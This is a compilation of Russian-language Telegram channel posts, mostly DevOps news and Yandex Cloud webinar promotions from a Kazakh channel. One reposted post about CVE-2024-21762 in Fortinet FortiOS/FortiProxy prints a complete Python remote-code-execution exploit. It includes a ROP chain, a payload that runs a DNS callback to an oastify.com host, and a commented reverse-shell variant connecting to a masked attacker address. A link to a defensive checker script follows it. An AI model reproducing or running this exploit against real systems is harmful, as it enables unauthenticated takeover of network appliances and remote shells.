Приглашаем на вебинар про техособенности и возможности платформы Yandex Cloud в Казахстане

Когда: 25 июня в 13:00 (GMT+5)

Это будет увлекательное погружение в облачную платформу для тех, кто только начинает пользоваться сервисами Yandex Cloud или планирует перенести свои приложения и данные в Казахстан.

На вебинаре расскажут:

🔍 как работает платформа Yandex Cloud на территории Казахстана
🔍 какие сервисы доступны пользователям
🔍 как начать работать в Yandex Cloud
🔍 как устроена консоль управления Yandex Cloud
🔍 как выполнить базовые задачи на старте: создать облако, запустить виртуальную машину, настроить сеть
🔍 как может проходить миграция в облачную инфраструктуру
🔍 как перенести работающие приложения и базы данных в Yandex Cloud

Особое внимание уделят первым техническим шагам на платформе. Также ответят на ваши вопросы.

➡️ Регистрируйтесь!

☄️ Новости и релизы инструментов DevOps

➖ GitLab 17.1

45+ новых улучшений, в том числе: реестр моделей и Secret Push Protection в бета-версии, GitLab Runner Autoscaler — общедоступная версия, а также несколько предложений по коду GitLab Duo в VS Code.

➖ Docker Desktop 4.31

Из нового: стали общедоступны air-gapped контейнеры. Они ограничивают доступ к сети, снимая нежелательную загрузку и выгрузку данных. В бета версии: вышел File Viewer для просмотра файлов конфигурации Compose, поддержка и проверка сборок GitHub Actions.

➖ k0smotron 1.0

Поможет управлять кластерами Kubernetes с помощью k0s, дистрибутива, ориентированного на edge и IoT. В новой версии реализована поддержка удаленных компьютеров, повышена доступность уровня управления и добавлена поддержка CLI clustercl.

#devops #gitlab #docker #k0smotron

@DevOpsKaz

☄️ Приглашаем на наш вебинар «Serverless: трюки и советы на практике» совместно с Yandex Cloud

Напоминаем, что 16 июля в 19:00 по Алматы состоится наш вебинар. Вы погрузитесь в тему Serverless и на практике узнаете возможности бессерверной архитектуры.

➖ Yandex Cloud в Казахстане. Расскажем, что из себя представляют сервисы Yandex Cloud на базе дата-центра в Казахстане, а также о планах по дальнейшему развитию платформы. Обсудим, какие преимущества и возможности может дать партнерство с Yandex Cloud локальному бизнесу.
➖ Serverless подход к архитектуре. Разберем основы и принципы Serverless: какие задачи он решает, и как его применение позволяет оптимизировать процессы разработки и развертывания приложений.
➖ Способы применения Serverless: для чего подходит, а для чего не годится. Проанализируем различные сценарии, рассмотрим, кому подходит этот подход, а кому — нет. Обсудим плюсы и минусы и разберем, что такое cloud native. Поделимся рекомендациями по выбору подходящей архитектуры в зависимости от специфики задач.
➖ Воркшоп по сервисам Яндекса для Serverless. Проведем практическую работу с триггерами для Yandex Cloud Functions, показывая, как эффективно использовать их для автоматизации процессов. Поделимся методами оборачивания всего этого в инфраструктуру как код (IaC), чтобы обеспечить повторяемость и управляемость настроек.

👉 Регистрируйтесь здесь

Поделитесь с коллегами и приходите сами. До встречи 🤝

Дальше в планах проводить эфиры постоянно. Будут вопросы — будем отвечать. Этот вебинар покажет нам, насколько вам это нужно.

@DevOpsKaz

👀 Как понять, что не хватает DevOps'у или SRE-инженеру для трудоустройства

На помощь приходит сообщество — SRE-инженер написал на Reddit, что 7 месяцев уже без работы. Да, даже у сеньоров бывает такое. Другие инженеры пришли на ревью его резюме и дали советов...

1️⃣ Не все свои навыки стоит расписывать одним полотном — большое разнообразие скиллов сбивает с толку. Стоит показывать только релевантные под конкретную вакансию, а вторичные сокращать.

2️⃣ Скиллы без влияния на бизнес — это пустое. Эффект от вашей работы должен быть четко прописан и заметен. Лучше в цифрах.

3️⃣ Подтверждение ваших компетенций должно быть явно прописано. Если вы сеньор или мидл — докажите это и привлеките внимание к своей кандидатуре с первых же строк.

👉 Почитать обсуждение полностью

Ну, и не забывайте прокачиваться из года в год. Навыки в нашей сфере часто устаревают и их нужно обновлять. Например, на курсах Слёрм от нашего учебного центра — у нас можно купить их по региональной скидке от 10%.

#devops #cv #sre

@DevOpsKaz

☄️ Автогенерация секретов в Kubernetes

Встречайте — secretgen-controller помогает генерировать секреты с конкретным типом данных. Они будут добавляться в Secret автоматически.

Чем полезен:

— Генерирует Certificate (CAs, leafs), Secret Template Field, Password, RSA Key и SSH Key
— Поддерживает экспорт и импорт секретов между пространствами имен
— Поддерживает создание секретов из данных, находящихся в других ресурсах Kubernetes

Особенно интересен тем, кто работает с секретами методом push, а не pull.

👉 Документация
👉 Примеры использования

#secrets #k8s #kubernetes

@DevOpsKaz

☄️ Упрощаем работу с сетью в Kubernetes

Многие знают про kube-proxy, а вот Cilium почему-то упускают из вида. Исправляем ситуацию — и рассказываем о ключевых фичах и главных отличиях.

1️⃣ Сетевая безопасность. Cilium использует eBPF для создания гибких сетевых политик.
2️⃣ Мониторинг через Hubble. Позволяет наблюдать за сетевым трафиком и выявлять проблемы.
3️⃣ Ingress-контроллер и L4-балансировщики. Улучшают распределение нагрузки.
4️⃣ Service Mesh. Облегчает управление микросервисами.

eBPF для ядра Linux — как JavaScript для браузера

📈 Сравнение с kube-proxy

Cilium демонстрирует более высокую производительность и низкую задержку благодаря использованию eBPF для обработки сетевого трафика в ядре Linux.

Тесты показывают, что Cilium может обрабатывать больше запросов в секунду и обеспечивает более стабильную работу при высоких нагрузках по сравнению с kube-proxy.

👉 Подробности в деталях

#k8s #kubernetes #cilium #kubeproxy

@DevOpsKaz

🔥 Как BMW внедряет хаос-инжиниринг и что это дает

BMW Group использует хаос-инжиниринг для повышения устойчивости своих систем. Компания создала внутреннюю команду для симуляции сбоев в производственной среде, выявления уязвимостей и повышения надежности.

👉 Читайте в новой статье и делитесь с коллегами

Здесь не только размышления о хаос-инженерии, но и вполне конкретные эксперименты.

#devops #chaos #cloud #aws

@DevOpsKaz

☄️ Наш вебинар «Serverless: трюки и советы на практике» совместно с Yandex Cloud стал еще интереснее!

Напоминаем, что 16 июля в 19:00 по Алматы состоится бесплатный вебинар. Вы погрузитесь в Serverless и на практике узнаете возможности бессерверной архитектуры.

🚩 Мы добавили в программу еще одного спикера — СОО Core 24/7 Александра Калинина. Саша расскажет про миграцию в облако на реальном кейсе. Какие были сложности, как их преодолели и что получил клиент в результате.

Будет интересно всем, кто занимается cloud migration или планирует делать это в будущем 💪

Также в программе:

➖ Yandex Cloud в Казахстане.
➖ Serverless подход к архитектуре.
➖ Способы применения Serverless: для чего подходит, а для чего не годится.

👉 Регистрируйтесь здесь

Этот вебинар для техлидов, СТО, DevOps специалистов и руководителей IT бизнеса, которые хотят оценить необходимость в cloud migration и оптимизировать этот процесс, узнать об альтернативах, улучшить управление данными.

Зовите коллег, начальников и приходите сами. До встречи 🤝

@DevOpsKaz

Fortinet FortiOS & FortiProxy Unauthorized RCE CVE-2024-21762
#RCE #CVE #Fortinet #FortiOS #FortiProxy

CVE-2024-21762 представляет собой уязвимость записи за границы буфера (buffer overflow) в Fortinet FortiOS и FortiProxy. Эта уязвимость позволяет неавторизованному атакующему выполнять произвольный код с помощью специально сформированных HTTP-запросов.

➡️Атакуемые продукты:
- FortiOS
- FortiProxy

Эксплойт:

import socket
import time
import argparse


TARGET = 'xxxxxxxxxxxx'  # Target IP
PORT = 443  # Target port, usually 443 for SSL VPN

def make_sock(target, port):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target, port))
    return sock

def send_payload(payload, target, port):
    with make_sock(target, port) as ssock:
        ssock.sendall(payload)

def main():
    ssl_do_handshake_ptr = b"%60%ce%42%00%00%00%00%00"
    getcwd_ptr = b"%70%62%2c%04%00%00%00%00"

    pivot_1 = b"%52%f7%fd%00%00%00%00%00" # push rdi; pop rsp; ret;
    pivot_2 = b"%ac%c9%ab%02%00%00%00%00" # add rsp, 0x2a0; pop rbx; pop r12; pop rbp; ret;

    rop  = b""
    rop += b"%c6%e2%46%00%00%00%00%00" # push rdi; pop rax; ret;
    rop += b"%19%6f%4d%01%00%00%00%00" # sub rax, 0x2c8; ret;
    rop += b"%8e%b2%fe%01%00%00%00%00" # add rax, 0x10; ret;
    rop += b"%63%db%ae%02%00%00%00%00" # pop rcx; ret;
    rop += b"%00%00%00%00%00%00%00%00" # zero rcx
    rop += b"%38%ad%98%02%00%00%00%00" # or rcx, rax; setne al; movzx eax, al; ret;

    rop += b"%c6%52%86%02%00%00%00%00" # shl rax, 4; add rax, rdx; ret;
    rop += b"%6e%d0%3f%01%00%00%00%00" # or rdx, rcx; ret; - rdx is zero so this is a copy
    rop += b"%a4%df%98%02%00%00%00%00" # sub rdx, rax; mov rax, rdx; ret;

    rop += b"%f5%2c%e6%00%00%00%00%00" #  sub rax, 0x10; ret;
    rop += b"%e4%e6%d7%01%00%00%00%00" #  add rsi, rax; mov [rdi+8], rsi; ret;

    rop += b"%10%1b%0a%01%00%00%00%00" # push rax; pop rdi; add eax, 0x5d5c415b; ret;
    rop += b"%25%0f%8d%02%00%00%00%00" # pop r8; ret; 0x028d0f25
    rop += b"%00%00%00%00%00%00%00%00" # r8

    pivot_3 = b"%e0%3f%4d%02%00%00%00%00" # add rsp, 0xd90; pop rbx; pop r12; pop rbp; ret;

    call_execl = b"%80%c1%43%00%00%00%00%00"

    bin_node = b"/bin/node%00"
    e_flag = b"-e%00"
  ## use this one for rev shell   b'(function(){var net%3drequire("net"),cp%3drequire("child_process"),sh%3dcp.spawn("/bin/node",["-i"]);var client%3dnew net.Socket();client.connect(1337,"xxxxxxxxxxx",function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/;})();%00'
    js_payload = b'(function(){var cp=require("child_process");cp.execSync("nslookup xxxxxxxxxxx.oastify.com");})();%00'

    form_value  = b""
    form_value += b"B"*11 + bin_node + b"B"*6 + e_flag + b"B"*14 + js_payload
    form_value += b"B"*438 + pivot_2 + getcwd_ptr
    form_value += b"B"*32 + pivot_1
    form_value += b"B"*168 + call_execl
    form_value += b"B"*432 + ssl_do_handshake_ptr
    form_value += b"B"*32 + rop + pivot_3
    body = (b"B"*1808 + b"=" + form_value + b"&")*20

    data  = b"POST /remote/hostcheck_validate HTTP/1.1\r\n"
    data += b"Host: " + TARGET.encode() + b"\r\n"
    data += b"Content-Length: " + str(len(body)).encode() + b"\r\n"
    data += b"\r\n"
    data += body

    send_payload(data, TARGET, PORT)

    # Short delay to ensure the server processes the first request
    time.sleep(2)

    # Preparing and sending the second part of the exploit
    data  = b"POST / HTTP/1.1\r\n"
    data += b"Host: " + TARGET.encode() + b"\r\n"
    data += b"Transfer-Encoding: chunked\r\n"
    data += b"\r\n"
    data += b"0"*4137 + b"\0"
    data += b"A"*1 + b"\r\n\r\n"

    send_payload(data, TARGET, PORT)

if __name__ == "__main__":
    main()

Подробные ресерчи можете найти ТУТ, ТУТ, ТУТ

Скрипт для проверки безопасности вашего сервера
https://github.com/BishopFox/cve-2024-21762-check

git clone https://github.com/BishopFox/cve-2024-21762-check; cd cve-2024-21762-check; python3 check-cve-2024-21762.py <host> <port>

🌚 @poxek

🔥 Кейс ioka: как помогли пройти сертификацию PCI DSS 4.0

Недавно мы анонсировали аудит PCI DSS как отдельную услугу — и сегодня рассказываем о том, как и чем помогали компании ioka, какие были сложности и решения.

👉 Читайте в новом кейсе

Небольшой спойлер:

Компания ioka обратилась к нам впервые 3 года назад — тогда мы мигрировали их приложения в Казахстан, чтобы избежать задержек и блокировок. В облаке осталась standby-копия системы как запасной план на случай, если ЦОД будет недоступен.

В экосистеме онлайн-платежей ioka разработка не прекращается, а стек технологий постоянно растет. Приближалась ежегодная сертификация PCI DSS. С этой задачей компания и обратилась к нам — получить сертификат PCI DSS 4.0.

#кейс #devops

@DevOpsKaz